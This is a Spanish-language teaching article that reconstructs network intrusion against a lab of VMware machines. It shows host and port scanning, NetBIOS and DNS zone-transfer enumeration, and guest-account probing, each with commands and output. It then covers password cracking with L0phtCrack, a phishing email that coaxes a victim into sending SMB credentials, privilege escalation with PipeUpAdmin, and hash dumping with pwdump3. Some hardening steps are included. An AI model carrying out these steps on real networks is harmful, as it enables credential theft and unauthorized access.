intrusiones_y_ataque

Roberto Carlos Guevara Calume

Las palabras no expresan exactamente lo que uno quiere decir” 1986 o 1987

DISECCION A INTRUSIONES, EN REDES DE DATOS

Este es un material divulgativo que pretende mostrar el uso de herramientas informáticas de fácil uso que se encuentran en internet, cabe anotar que las pruebas y el análisis van más allá de lo contenido es este documento.


Ingeniero de sistemas y Especialista en redes corporativas e integración de tecnologías de la universidad Sanbuenaventura,, Docente de tiempo completo del ITM

Resumen Los mayores esfuerzos de los administradores de redes de datos se dirigen a evitar la violación de seguridad de sus redes desde internet, y este es solo el primer paso, pues los ataques suelen ocurrir al interior de la red. En proceso de intrusión se observan varias etapas en su orden 1)obtención de la información básica (Intrusión), 2)Ataque básico, 3)Exploits y Vulnerabilidad 4)Defensa, solo abordaremos la numerales 1y 2 La base fundamental del atraque es saber que se puede atacar, esto el pilar del descubrimiento de la LAN(red de área local)., y existen un sin número de Herramientas con este fin, una es SuperScan, otra es ScanLine, con estas herramientas el intruso ya descubre cuales computadores están ON-LINE y que funciones cumplen, dentro de la red pues los puertos que están abiertos de la maquina atacada lo dicen. El ataque de la LAN no solo pone directamente en peligro los equipos miembros esta pues recordemos el

esquema de dominios de Microsoft, grupos de trabajos de relaciones de confianza planteado Microsoft que permiten que el atacante se infiltre a otras redes Palabras Claves LAN, Ataque, Victima, Windows , Linux, escaneo, puertos Dirección IP. Abstract The major efforts of the administrators of data networks are aimed at preventing the violation of security of their networks from the Internet, and this is just the first step, because the attacks often occur inside the local network. In the process of intrusion observed several stages ens or order 1) obtain basic information (intrusion), 2) basic attack, 3) Vulnerability Exploits and 4) Defense, address only the numerals 1 and 2 The basis of the dock is that you can attack, this cornerstone of the discovery of the LAN, and there are a number of tools for this purpose is a Superscan another ScanLine is with


these tools the intruder and discovers that computers are ON-LINE and roles within the network because the ports are open on the machine attacked what they say. The attack not only on the LAN directly threatens teams miebros remember this as the outline of Microsoft domains, working relationships of trust raised by

Microsoft that allow an attacker to infiltrate other networks KeyWords LAN, Attack, Victim, Windows, Linux, scanning, port IP address.

1. INTRODUCCIÓN

El creciente uso de las Tics para labores cotidianas es altamente dependiente de la infraestructura que las soporta, equipos de computo, redes datos e internet. Este texto está orientado a comprender en forma general como se preparan e implementan ataques, será abordado de forma concisa pero sin desmeritar su contenido. No se entraran a explicar de talles teóricos que pueden ser consultados en fácilmente en Internet, sino que se recrearan ataques reales. La intención es mostrar la visón y las herramientas que usaría una persona no autorizada (Intruso) para tener algún dominio o acceso a información de nuestra LAN También se darán luces de como pueden ser contrarrestadas intrusiones y ataques, pero dando mayor explicación de cómo se logran

2. CONCEPTOS Y DEFINICIONES INICIALES Antes de iniciar se expondrán los conceptos y definiciones iníciales intruso, (lat. -su) adj. Que se ha introducido sin derecho. adj.-s. Detentador de alguna cosa alcanzada por intrusión Ataque m. Acción de atacar (acometer y llevar o tomar la iniciativa). Componente ofensivo de algo. Acometimiento de algún accidente de que evita el normal funcionamiento fig. Impugnación, disputa.


hacker (voz inglesa) com. Persona que por diversos motivos se dedica a manipular sistemas informáticos ajenos. En otras palabras, un hacker es toda persona que pueda tener información de nuestra LAN que no haya sido otorgada directamente, a causa de su trabajo es un intruso, Si la información obtenida fue a través de fallas de seguridad en la red, esa persona será un Hacker, y según su conocimiento y las fallas de seguridad en la red este podrá implementar un atraque.

3. DISECCIÓN DE UN ATAQUE Para la realización de un ataque se observan varias etapas de la construcción de un ataque.

1. Obtención de la información básica (Intrusión): Esta etapa abarca el recopilar datos e información sobre la LAN víctima. Tales como que tipos de servidores tiene como Windows , Linux,, que sistemas operativos usan, cuales son PDC, como se asigna el login,♣ cuales servidores tienen montados servicios (Dhcp, Dns, etc), cuales cuantos equipos están en red y cual es su dominio, que carpetas comparten, que puestos están abiertos, etc.

2. Ataque básico : Esta etapa Intenta tomar privilegios o contraseñas, así como eliminar huellas o log que den pistas de el ataque, básicamente, lo anterior es posible por una mala configuración, políticas deficientes o por no asegurar los sistemas, bien sea por negligencia o desconocimiento del administrador .

3. Exploits y Vulnerabilidad: Intenta explotar, fallas conocidas de programación en los sistemas instados para brindar vulnerar servicios como IIS, SQL, Samba, SENDMail, FTP, Apache, y otros.

4. Defensa : Como evitar y que medidas para evitar las intrusiones, y los ataques

♣ En muchas empresas el login de una persona puede ser construido de forma facil y de echo es información “publica”, una política es común es usar la primera letra del nombre, el apellido y un consecutivo, p.ejm Simón Bolívar tendría SBOLIVAR1 en caso de no tener Homónimos.


3.1 QUE SE ESTA ATACANDO La Obtención de la información, ya que un ataque esta muy estrechamente relacionado, con el tipo de sistema operativo Victima, el protocolo de usado, los servicios y puertos comprometidos. Partiendo de las diferencias claras de estos 2 sistemas Operativos y su difusión, tanto en arquitectura, how know, seguridad y productos usados es pertinente esta división. El modelo usado estará basado en TCP/IP (4 capas sin importar lo físico) pero las capas se tomaran como indica el modelo OSI (7 capas). Los protocolos de capas 1,2 en OSI no son relevantes, con excepción de la dirección MAC. Lo anterior por ser el conjunto de protocolos TCP/IP el mas usado tanto en LAN como en WAN, es de anotar que se no se usa un direccionamiento IP sino un IPX y un transporte TCP o UDP sino SPX nada de lo siguiente funcionará. En cuanto a los productos, por ejemplo, el ataque efectuado a IIS, no será igual al realizado a Apache. Los programas usados para hacer estos ataques se mencionarán y se dirigirá al sitio en Internet donde se podrán acceder, en lo posible se usarán herramientas gratuitas. 3.2 ESQUEMA IMPLEMENTADO Para realizar los ataques se implemento la siguiente LAN en MVWare Nombre del PC Direccion IP Servicios WINXP 192.168.0.1 No LINUX01 192.168.0.2 FTP,CORREO WIN2000 192.168.0.3 PDC,DNS,DHCP,FTP,

HTTP LINUX02 192.168.0.10 FTP WIN98 192.168.0.200 No Tabla 1 Conformación de la red implementada


Ilustración 1 Diseño de la red implementada

4. INTRUSIONES EN WINDOWS. Es necesario que el lector conozca el sistema operativo Windows, que conozca sus características básicas como que son PDC y BDC, que es un dominio, las diferencias entre Linux y servidores windows, que es un bosque y un árbol, además de experiencia en la instalación de paquetes. El problema empieza cuando un intruso intenta atacar nuestra LAN, bien sea desde Internet o desde el interior, o bien capture la información desde el interior y ataque de fuera♣.

Descubriendo la LAN Un atacante puede tener información de muchas formas, en nuestra LAN victima, la información puedes ser recopilada por Internet, por personal de soporte al interior, o por personas que tengan acceso a un punto de red.

♣ La mayoría de los ataque son realizados por personas que conocen el interior de la LAN, pero si no se tuviera esta información, es posible obtenla.


Escaneo Que sucede si el intruso no esta en Internet buscando una victima, si no que es una persona que conoce la LAN, sabe cual es el direccionamiento IP usado, cual es el dominio, como se construyen los LOGIN, que hacen y cuales son los servidores. Entonces este intruso esta más cerca de poder implementar un ataque, Hay que recordar que en su gran mayoría los ataques son realizados por personal que de una u otra forma tiene contacto directo con la LAN. De no ser así, y el escenario fuera que el intruso no conoce nada acerca de la LAN pero tiene acceso a un punto de red, este podría recopilar esta información, desde el interior haciendo escaneo. Ping y Escaneo de Puertos El ping es usado para descubrir si un pc esta ON-LINE este es un mensaje ICMP de eco, si el intruso desconoce por completo la LAN victima, este intentará hacer ping a varias direcciones IP y mirar cual de ellas esta ON-LINE y también querría saber cuales puertos de esas ip que contesten estan abiertos. Esto es el pilar del descubrimiento de la LAN, y existen un sin número de Herramientas con este fin, una es SuperScan♣, otra es ScanLine♣♣

INTRUSIÓN USANDO ESCANEO CON SCANLINE

Narración

Paso Uno Ejecutar el programa con parámetros asi: C:> sl -htLT 192.168.0.1-192.168.0.254 Los modificadores htLT no son totalmente necesarios

Escanea una red clase C privada desde 192.168.0.1 A 192.168.0.254 y descubre cuales equipos estan ON-LINE y que puertos tienen abiertos TCP y UDP

------------------------------------------------------------------------------- 192.168.0.1 Responded in 0 ms. 0 hops away Responds with ICMP unreachable: Yes TCP ports : 7 9 13 19 21 25 80 110 135 139 389 443 445 1024 1025 1027 1720 2869 5000 UDP ports : 7 9 53 67 68 123 135 137 138 161 445 500 520 1900 3456 ------------------------------------------------------------------------------ 192.168.0.2 Responded in 0 ms. 0 hops away Responds with ICMP unreachable: Yes TCP ports : 21 22 23 25 79 80 111 113 139 389 515 587 901 1720 10000 UDP ports : 68 69 111 123 135 137 138 161 191 192 256 260 407 445 500 514 520 1009 1024 1025 1027 1028 1030 1033 1034 1035 1037 1041 1058 1060 109 1 1352 1434 1645 1646 1812 1813 2002 2049 2140 2161 2301 2365 2493 2631 2967 3179 3327 3456 4156 4296 4469 4802 5631 5632 11487 31337 32768 32769

La ip 192.168.0.1 Esta ON-LINE Respondió la IP 192.168.0.2

♣Puede ser bajado de http://www.foundstone.com/rdlabs/tools.php?category=scanner, es un scanner de IP y puertos grafico de facil uso. ♣♣ herramienta en modo texto fácil de usar y muy rápida http://www.foundstone.com/rdlabs/tools.php?category=scanner


32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781 32782 32783 32784 32785 32786 32787 32788 32789 32790 ------------------------------------------------------------------------------- 192.168.0.3 Responded in 10 ms. 0 hops away Responds with ICMP unreachable: Yes TCP ports : 21 25 53 80 88 119 135 139 389 443 445 563 593 636 1027 1029 1720 1723 3268 3372 UDP ports : 53 123 135 137 138 161 445 500 1028 1645 1646 1812 1813 3456 ------------------------------------------------------------------------------- 192.168.0.10 Responded in 10 ms. 0 hops away Responds with ICMP unreachable: Yes TCP ports: 21 22 25 79 80 110 111 113 389 515 587 901 1720 10000 UDP ports: 68 69 111 123 135 137 138 161 191 192 256 260 407 445 500 514 520 1009 1034 1035 1037 1041 1058 1060 1091 1352 1434 1645 1646 1812 1813 1900 1978 2002 2631 2967 3179 3327 3456 4045 4156 4296 4469 4802 5631 5632 11487 31337 32768 3276 32779 32780 32781 32782 32783 32784 32785 32786 32787 32788 32789 32790 43981 ------------------------------------------------------------------------------- 192.168.0.200 Responded in 10 ms. 0 hops away Responds with ICMP unreachable: Yes TCP ports: 139 389 1720 UDP ports: 137 138 ------------------------------------------------------------------------------- Scan finished at Wed Jun 04 03:42:52 2003 4 IPs and 1068 ports scanned in 0 hours 0 mins 32.92 secs

Respondió la IP 192.168.0.3 Respondió la IP 192.168.0.200

Tabla 2 Intrusión usando Scanline

El intruso ya descubrió cuales computadores están ON-LINE y que funciones cumplen, pues los puertos que están abiertos lo dicen, por lo cual es muy útil tener a la mano un listado de puertos y la función asociada veamos unos pocos ejemplos. Puerto Transporte Servicio Descripción 21 UDP FTP Protocolo de transferencia de archivos 53 TCP DNS Sevidor de Nombres 80 TCP HTTP Servidor WEB 137 UDP NBNS Servicio de Nombres Netbios 445 TCP SMB sobre netbios 10000 TCP Webmin Tabla 3 Algunos Puertos Descubriendo dominios y grupos de trabajo Recordemos el esquema de dominios, grupos de trabajos de relaciones de confianza planteado Microsoft.

INTRUSIÓN USANDO NET VIEW

Narración

Paso Uno Ejecutar el programa con parámetros asi:

Muestra los grupos de trabajo y dominos de la red


C:> net view /domain

Dominio --------------------------------------------- GRUPOLINUX INTRUSO RCGCALUME Se ha completado el comando correctamente.

Existen 3 grupos de trabajo

Paso Dos Ejecutar el programa con parámetros asi: C:> net view /domain: RCGCALUME

Muestra la equipos asociados a RCGCALUME

Servidor Descripción --------------------------------------------- \\WIN2000 \\WIN98 Se ha completado el comando correctamente.

Existen dos equipos

Tabla 4 Uso de NetView Descubriendo La red PDC y Mas. Si un intruso sabe que la LAN victima es una red Microsoft querrá saber mas información de los equipos ONLINE. De la intrusión con Scanline sabemos que están ON-LINE las IP 192.168.0.1 , 192.168.0.2, 192.168.0.3 y 192.168.0.200. Por lo cual queremos saber mas de una IP en espacial y usamos un comando llamado NBTSTAT♣. Sin embargo se recomienda usar el un programa llamado NBTSCAN♣♣, el cual es ,mas completo utilizando mas modificadores. En este momento el intruso debe saber de una u otra forma el rango de direcciones IP de la LAN victima, pues luego de hacer varios de escaneos a la LAN el conocer estos rangos es cuestión de tiempo. Con la información arrojada por el escaneo logramos detectar que la red es una clase C privada, 192.168.0.0 e intuimos una mascara 255.255.255.0 ver intrusión de escaneo . Pero podemos descubrir más.

INTRUSIÓN USANDO ESCANEO NBTSCAN

Narración

Paso Uno Ejecutar el programa con parámetros asi: C:> nbtscan 192.168.0/24

Escanea la red clase C privada 192.168.0.0 usando una mascare de 24 bit 255.255.255.0

♣ Este es un comando que viene con los sistemas operativos Microsoft ♣♣ Se pude bajar de www.inetcat.org/software/nbtscanf.html


Doing NBT name scan for addresses from 192.168.0.0/24 IP address NetBIOS Name Server User MAC address ------------------------------------------------------------------------------ 192.168.0.0 Sendto failed: Cannot assign requested address 192.168.0.1 WINXP <server> <unknown> 00-50-56-c0-00-01 192.168.0.3 WIN2000 <server> ADMINISTRADOR 00-50-56-dc-eb-b8 192.168.0.10 Recvfrom failed: Connection reset by peer 192.168.0.2 LINUX01 <server> LINUX01 00-00-00-00-00-00 192.168.0.200 WIN98 <server> USR1 00-50-56-dd-40-9d

En pocos segundos nos muestra la IP de cada equipo que respondió El nombre Netbios y usuario que hizo login en cada equipo y la MAC NOTA: el equipo INTRUSO. Donde se esta ejecutando todo es WINXP y nunca se a autenticado en la red

Tabla 5 Uso del NBScan (1) Es posible tener mas información, sobre cada dirección IP así

INTRUSIÓN USANDO ESCANEO NBTSCAN

Narración

Paso Uno Ejecutar el programa con parámetros asi: C:> nbtscan -v -s : 192.168.1.0/24

Escanea la red clase C privada 192.168.0.0 usando una mascara de 24 bit 255.255.255.0 Los 3 puntos son los separadores

192.168.0.0 Sendto failed: Cannot assign requested address 192.168.0.1....WINXP ....00U 192.168.0.1....WINXP ....20U 192.168.0.1....INTRUSO ....00G 192.168.0.1....INTRUSO ....1eG 192.168.0.1....INTRUSO ....1dU 192.168.0.1....☺☻__MSBROWSE__☻ ....01G 192.168.0.1....MAC....00-50-56-c0-00-01 192.168.0.2....LINUX01 ....00U 192.168.0.2....LINUX01 ....03U 192.168.0.2....LINUX01 ....20U 192.168.0.2....☺☻__MSBROWSE__☻....01G 192.168.0.2....GRUPOLINUX ....00G 192.168.0.2....GRUPOLINUX ....1dU 192.168.0.2....GRUPOLINUX ....1eG 192.168.0.2....MAC....00-00-00-00-00-00 192.168.0.3....WIN2000 ....00U 192.168.0.3....WIN2000 ....20U 192.168.0.3....RCGCALUME ....00G 192.168.0.3....RCGCALUME ....1cG 192.168.0.3....RCGCALUME ....1bU 192.168.0.3....RCGCALUME ....1eG 192.168.0.3....WIN2000 ....03U 192.168.0.3....RCGCALUME ....1dU 192.168.0.3....☺☻__MSBROWSE__☻....01G 192.168.0.3....INet~Services ....1cG 192.168.0.3....IS~WIN2000....00U 192.168.0.3....ADMINISTRADOR ....03U 192.168.0.3....MAC....00-50-56-dc-eb-b8 192.168.0.10 Recvfrom failed: Connection reset by peer 192.168.0.200....WIN98 ....00U 192.168.0.200....RCGCALUME ....00G 192.168.0.200....WIN98 ....03U 192.168.0.200....WIN98 ....20U

Muestra la IP, el ,nombre Netbios del equipo y un código 192.168.0.0 como es de suponer esa dirección es el Id de red y no la IP asignada a un equipo, y por eso da un error. 192.168.0.1 00U : nombre de maquina WINXP 20U: Servidor 00G: Nombre del dominio INTRUSO 1EG y 1DU: grupo INTRUSO 01G: equipo principal de su grupo por ultimo la dirección MAC 092.168.0.2 Se llama LINUX01, Es Servidor, Pertenece a GrupoLINUX 03U: usuario de mensajeria LINUX01, generalmente es el Mismo LOGIN La MAC es 00-00-00-00-00-00 Muy Raro!! O Puede ser que NO es un equipo Windows normal. 192.168.0.3 Se llama WIN2000 Es Servidor, Pertenece a RCGCalume 1CG: Es un Controlador de Dominio Llamado RCGCalume osea el grupo y el Dominio se llaman Igual ¡!! 1CG: Ofrece servicios como DHCP,DNS 00U: aquí indica que es servidor IIS 192.168.0.10 Este responde pero no entrega información puede ser un equipo con un sistema operativo diferente a Windows.


192.168.0.200....RCGCALUME ....1eG 192.168.0.200....USR1 ....03U 192.168.0.200....MAC....00-50-56-dd-40-9d

192.168.0.200 Se llama Win98 Grupo RCGCalume

Paso dos Ejecutar el programa con parámetros asi: C:> nbtscan -v –h –s… 192.168.0/24

Observar hay un Nuevo parámetro -h

192.168.0.0 Sendto failed: Cannot assign requested address 192.168.0.1....WINXP ....Workstation Service 192.168.0.1....WINXP ....File Server Service 192.168.0.1....INTRUSO ....Domain Name 192.168.0.1....INTRUSO ....Browser Service Elections 192.168.0.1....INTRUSO ....Master Browser 192.168.0.1....☺☻__MSBROWSE__☻....Master Browser 192.168.0.1....MAC....00-50-56-c0-00-01 192.168.0.10 Recvfrom failed: Connection reset by peer 192.168.0.3....WIN2000 ....Workstation Service 192.168.0.3....WIN2000 ....File Server Service 192.168.0.3....RCGCALUME ....Domain Name 192.168.0.3....RCGCALUME ....Domain Controllers 192.168.0.3....RCGCALUME ....Domain Master Browser 192.168.0.3....RCGCALUME ....Browser Service Elections 192.168.0.3....WIN2000 ....Messenger Service 192.168.0.3....RCGCALUME ....Master Browser 192.168.0.3....☺☻__MSBROWSE__☻....Master Browser 192.168.0.3....INet~Services ....IIS 192.168.0.3....IS~WIN2000....IIS 192.168.0.3....ADMINISTRADOR ....Messenger Service 192.168.0.3....MAC....00-50-56-dc-eb-b8 192.168.0.2....LINUX01 ....Workstation Service 192.168.0.2....LINUX01 ....Messenger Service 192.168.0.2....LINUX01 ....File Server Service 192.168.0.2....☺☻__MSBROWSE__☻....Master Browser 192.168.0.2....GRUPOLINUX ....Domain Name 192.168.0.2....GRUPOLINUX ....Master Browser 192.168.0.2....GRUPOLINUX ....Browser Service Elections 192.168.0.2....MAC....00-00-00-00-00-00 192.168.0.200....WIN98 ....Workstation Service 192.168.0.200....RCGCALUME ....Domain Name 192.168.0.200....WIN98 ....Messenger Service 192.168.0.200....WIN98 ....File Server Service 192.168.0.200....RCGCALUME ....Browser Service Elections 192.168.0.200....USR1 ....Messenger Service 192.168.0.200....MAC....00-50-56-dd-40-9d

Con este parámetro es mas facil conocer la LAN sin Códigos de Netbios, Analizar

Tabla 6 Uso del NBScan(2)

INTRUSIÓN USANDO DUMPSEC

Narración

Esta es una herramienta grafica que puede dar información de permisos, del filesystem, registry, printer, archivos compartidos, usuarios grupos etc, viene en el

Se dirigio a la ip 192.168.0.3

07/06/2003 05:22 a.m. - Somarsoft DumpSec (formerly DumpAcl) - \\192.168.0.3 UserName Administrador FullName Comment Cuenta para la administración del equipo o dominio PswdCanBeChanged Yes HomeDir Invitado FullName Comment Cuenta para acceso como invitado al equipo o dominio PswdCanBeChanged No HomeDir

Este e un reporte pero, explore que posibilidades diferentes ofrece, El reporte original es mucho mas extenso


A simple Vista un Intruso puede reconstruir con estas herramientas la LAN victima, solo con un portátil y un punto de red, pero como evitar esto? Una forma es bloqueando los puertos TCP y UDP 135,136,137,138,139 y 445 usando un FIREWALL para evitar intrusos desde Internet ó deshabilitando estos puertos en cada equipo de la red

PROTECCIÓN INTRUSIÓN USANDO ESCANEO (1) Contra (1,2,3,4,5) Windows XP y 2000

Narración

Paso Uno //INICIO //PANEL DE CONTROL //CONEXIONES DE RED //PROPIEDADES

Se Selecciona la conexión que se desee, Por ejemplo : Para Internet la de Acceso telefonico y para la LAN LA conexión de Área Local y Se selecciona PROPIEDADES

PASO DOS //GENERAL //PROPIEDADES

En la pestaña GENERAL Se Selecciona TCP/IP y se selecciona el botón PROPIEDADES

//GENERAL //OPCIONES AVANZADAS

En la pestaña GENERAL se selecciona el botón OPCIONES AVANZADAS

//OPCIONES // FILTRADO TCPIP //PROPIEDADES

En la pestaña OPCIONES se selecciona FILTRADO TCPIP Y selecciona el botón PROPIEDADES Luego usar el Editor para permitir o bloquear puertos TCP o UDP

Jjaramillo1 FullName Juan Jaramillo Comment Gerente de marcadeo, tel 299-0077 ext 341 PswdCanBeChanged Yes HomeDir \\win2000\Mercadeo IUSR_WIN2000 FullName Cuenta de invitado a Internet

Tabla 7 Uso del DUMPSEC


PREGUNTANDO AL DNS Podemos preguntar al DNS de la red muchas cosas las cuales nos serán muy útiles, el comando usado es NSLOOKUP♣ , y lo primero es preguntar quien es el DNS, aunque lo sospechamos pues solo hay un PDC que es WIN2000. Otra cosa que aun no sabemos es como se llama el dominio, dominio.com o dominio.edu.co . pero no hay problema NSLOOKUP lo dirá

INTRUSIÓN USANDO NSLOOKUP

Narración

Paso Uno Ejecutar el programa con parámetros asi: C:> nslookup win2000

Usamos WIN2000 pues sospechamos de es un DNS, pero pudimos usar cualquier otro equipo en la red. como LINUX01...

Nombre: win2000.rcgcalume.org Address: 192.168.0.3

Eureka el dominio es RCGCalume.org

Paso Dos Ejecutar el programa con parámetros asi: C:> nslookup >ls rcgcalume.org

Este comando nos deja en un

prompt >

rcgcalume.org. A 192.168.0.3 rcgcalume.org. NS server = win2000.rcgcalume.org rcgcalume.org. NS server = www.win2000.rcgcalume.org rcgcalume.org. NS server = www.linux01.rcgcalume.org gc._msdcs A 192.168.0.3 linux01 A 192.168.0.2 www.linux01 A 192.168.0.2 linux02 A 192.168.0.10 win2000 A 192.168.0.3 www.win2000 A 192.168.0.3 winxp A 192.168.0.1

Y nos aparece la tabla DNS con ip y direcciones para la tipos A NS. Los equipos LINUX01 y .WWW.LINUX01 Tienen la misma IP, en este caso un computador tienen 2 nombres,

Paso tres Ejecutar el programa con parámetros asi: Sin salir del prompt >ls -t MX rcgcalume.org

Bueno y el servidor de correo que, cual es ?, el tipo MX ,

rcgcalume.org. MX 10 linux01.rcgcalume.org >exit

OK, es el linux01, la IP 192.168.0.10 Exit para salir

Tabla 8 NSLookup Esta información puede pedirse y es enviada, por que el servidor DNS es consiente que pueden existir otros DNS actuando en forma solidaria, y por que pueden haber otros dominios a los que mandar y recibir información, sin embargo podemos restringir las direcciones IP autorizadas a recibir esta información

PROTECCIÓN INTRUSIÓN DNS en Windows 2000 server

Narración

// INICIO // PANEL DE CONTROL // HERRAMIENTAS ADMINISTRATIVAS // DNS

Llegamos a la parte de configuración de DNS Luego....

♣ Nslookup viene de forma estandart con windows


// XXX // Zonas de Búsqueda Directa // YYY

Donde XXX Es Equipo que contiene el DNS, YYY Es el domino a proteger, hacer click derecho en YYY

// PROPIEDADES // Transferencias de Zona //

Del menú contextual Seleccionar el item Propiedades y seleccionar la pestaña de Trasnferencias de Zona . Luego según las necesidades se pueden deshabilitar completamente o, elegir que ciertas direcciones IP pregunten directamente.

Tabla 9 Protección al DNS Sumario: • Es una red, privada clase C, tiene varios, servicios DNS (53), FTP(21),

Correo(110), LDAP(389), WEB(80), NETBIOS(138 -138), WEBMIN(10000) . • La red tiene varios grupos de trabajo GrupoLinux, RCGCalume, e INTRUSO el

grupo creado por el atacante, este computador solo tiene configurada una ip valida, nada mas.

• Se conocen los computadores que pertenecen a cada grupo, • Se Conoce el nombre Netbios de Cada maquina su IP y el usuario que hizo el

login en cada computador, la mac y la cuenta de mensajes , Intrusion • Se sabe que existe un PDC que pertenece al grupo RCGCalume y se llama

WIN2000, y tiene IIS montado. • Se tiene información de cada cuenta creada en el PCD e información basica

como nombres del usuario cargo, teléfono y correo, además se puede intuir la forma con que se asignan los login y los directorios asignados a cada usuario

• Se sabe cual es el nombre del dominio, y los nombres tanto reales de las ip como los alias, se sabe cual es el servidor de correo

• Cualquier otra información detallada se puede consultar al AD.

5. ATAQUES EN WINDOWS Luego de la intrusión, ósea el solo tener información viene el ataque que empieza con la obtención de una contraseña, bien sea adivinada, robada, encontrada por casualidad o tomada a la fuerza.

La cuenta de invitado La cuenta de invitado, por defecto esta desactivada, pero los administradores y pasa mucho, cuando se necesita una cuenta de usuario con pocos privilegios y momentáneamente Habilitan la cuenta de invitado, esta cuenta no tiene password, aunque puede ser cambiada, esto es importante por que una cuenta desactivada pero no borrada o renombrada.


ATAQUE ADIVINANADO CONTRASEÑAS USANDO NET USE

Narración Se intenta establecer si la cuenta de invitado esta borrada , habilitad o deshabilitada

Paso Uno Ejecutar el programa con parámetros así C:\>net use \\192.168.0.3\IPC$ * /u:invitado Escriba la contraseña para \\192.168.0.3\IPC$: Error de sistema 1331. Error de inicio de sesión: la cuenta está desactivada.

En este caso esta desactivada pero no borrada.

C:\>net use \\192.168.0.3\IPC$ * /u:invitado Escriba la contraseña para \\192.168.0.3\IPC$: Se ha completado el comando correctamente.

En este caso esta activada y no tiene password (enter)

C:\>net use \\192.168.0.3\C$ * /u:invitado Escriba la contraseña para \\192.168.0.3\C$: Error de sistema 1326. Error de inicio de sesión: nombre de usuario desconocido o contraseña incorrecta .

Aquí esa contraseña fue eliminada o renombrada

Tabla 10 Cuenta de invitado

Adivinar Contraseñas Para Adivinar contraseñas debemos usar una herramienta tal, que si sabemos un nombre de usuario, la herramienta sea capaz de encontrar el password, autenticándose a un servidor, esto equivale a hacer manualmente muchas autenticaciones hasta lograr el acceso, lo cual sería casi imposible. Existen muchas herramientas para adivinar o crakear contraseñas, dentro de las más conocidas y que usaremos estan. Brutus La Herramienta llamada Brutus, puede enviar muchos paquetes SMB directamente al servidor a atacer, con el usuario, dominio y un password, este password puede ser adquirido de varias formas, una es la fuerza bruta, osea el password es generado, o el password es leido de un archivo llamado Diccionario. SMBRelay Esta es una alternativa, No grafica y muy rápida para poder “ interceptar los datos de login en la red, esta herramienta genera un archivo donde se guarda la el password encriptado, y luego sobre este archivo de puede ejecutar una cracker para que la desencripte.


L0PHTCrack Otra herramienta llamada L0phtCrack puede hacer lo anterior y además puede capturar, el archivo SAM, vaciar los passwords desde el registry además de capturar el trafico SMB en toda la red o el trafico SMB desde o hacia un equipo en particular, y que mejor que el propio PDC. L0phtCrack Captura el trafico y extracta información como:

- IP origen y destino - USER NAME - Contraseña encriptada

Luego el L0phtCrack intenta sacar la contraseña original de la contraseña encriptada, el asunto ahora, es cuestión de tiempo, si es una contraseña débil, solo caracteres, o peor palabras que puedan estar en un diccionario (normal)o corta 5 o menos caracteres , podemos decir que el asunto es cuestión de minutos u horas según qué tan “mala sea la contraseña” el tiempo pueden ser meses, años o lustros o más mucho más si es de 16 o más caracteres con mayúsculas, minúsculas, caracteres especiales, y números. SMB SNIFFING Al momento de hacer la autenticación los datos los datos de login y password de usuario pasan por la red, este es momento en el que se produce el ataque. usando una utilidad del L0phtcrack llamada SMB Packet Capture, en la versión 2.5♣

Ilustración 2 Pantalla de salida de L0phtcrack Con esto tenemos password y una contraseña validos en el dominio. Pero con una cuenta limitada, estamos limitados, es preferible ser el administrador.

♣ Al momento de hacer este ataque encontré la versión mejorada, llamada LC4, y la utilidad cambio de nombre llamándose IMPORT FROM Sniffer.


Suponemos que por cualquier razón la contraseña no pueda ser capturada al inicio de la sesión, Por ejemplo la del administrador aun es posible que las credenciales SMB pasen por la red.

ATAQUE A CONTRASEÑAS USANDO SMB Sniffing

Narración Se obligar a la victima enviar credenciales SMB y crackear la contraseña, la herramienta L0Phtcack hace todo

Paso Uno C:\> NET USE \\X.X.X.X\FILE

El asunto consiste en obligar a la victima a elecutar una instrucción como esta, con lo cual este reenviara sus contraseñas como obligarlo??

Paso Dos Para: [email protected] Cc: [email protected] Asunto: Algo sugestivo Hola. Xx xxxxx xxx xxxxxxx xx x xxxx xxxx En esta dirección File://192.168.0.3/oferta.doc

Una forma es enviando un correo, recoredemos que tenemos el login y password de un usuario “legal” mmarulanda y tenemos una lista de usuarios posible victimas (Sin password crackeado) ,Jjaramillo1, invitado, Administrador Configuramos la cuenta de correo de mmarulanda1 o enviamos un e mail anónimo (que luego veremos), en un equipo y como ya sabemos que el servidor linux02 es servidor de corrreo(7) y el dominio RCGCalume.org Enviamos el correo. el archivo oferta.doc puede no existir.

PipeUPADMIN. Pipeupadmin es un programa que permite que cualquier usuario sea incluido en la lista de administradores de un equipo, la única restricción es que debe ser ejecutado desde consola, (en el teclado del equipo atacado) o desde una sesión de terminal Server. Si el servidor no esta custodiado, se puede llevar un diskett pues es un solo ejecutable de 46k, si no es posible el acceso directo solo se realiza una sesión terminal Server, ejecutar el programa y reiniciar en una cuenta como administrador.

ATAQUE USANDO PIPEUPADMIN Usando Terminal Server

Narración Se obligar a la victima a dar permisos de administrador,

Paso 1 Usando el ataque (2) SMB Sinfín


pudimos tener una usuario y una contraseña iniciar una secion Interactiva

Paso Dos Corremos pipeupadmin C:/> pipeupadmim

No siempre es tan fácil en encontrar una cuenta que permita ejecutar programas desde diskquet, pero se puede copiar al espacio de disco asignado en el servidor. El encontrar cuentas y contraseñas con mas privilegios es decisivo al momento del ataque

PWDump Este programa es capas de tomar todas las cuentas con sus respectivas contraseñas encriptadas que luego pueden ser des encriptadas con L0Phtcack LC4

ATAQUE A CONTRASEÑAS PWDUMP

Narración Se obligar a la victima enviar sus cuentas y contraseñas,luego para crackear las contraseñas, usamos la herramienta L0Phtcack

Paso Uno (en el equipo del atacante) C:\>pwdump3 win2000 arc.txt administrador pwdump3 by Phil Staubs, e-business technology Copyright 2001 e-business technology, Inc. This program is free software based on pwpump2 by Tony Sabin under the GNU General Public License Version 2 (GNU GPL), you can redistribute it and/or modify it under the terms of the GNU GPL, as published by the Free Software Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS PROGRAM. Please see the COPYING file included with this program (also available at www.ebiz-tech.com/pwdump3) and the GNU GPL for further details.

La sintaxis para pwdump3 es : Win2000 : la maquina a “saquear” sus cuentas Arc.txt : archivo donde se copiaran las cuentas Administrador : cuenta usada, esta debe tener privilegios de administrador.


Paso Dos Please enter the password >*******

Pide la contraseña de administrador, que fue lograda bien sea con ataque (2) smb capture o Ataque (4) Pipeupadmin.

Paso tres Abrimos el programa LC4 File // New session Import // Import form PWDump File

En pocos segundos se crea el archivo arc.txt Y se cracka con el programa LC4 En la opción File creamos una nueva Sesión Importamos el archivo Arc.txt tiempo después (según la cantidad de cuentas y lo complejo de las claves )

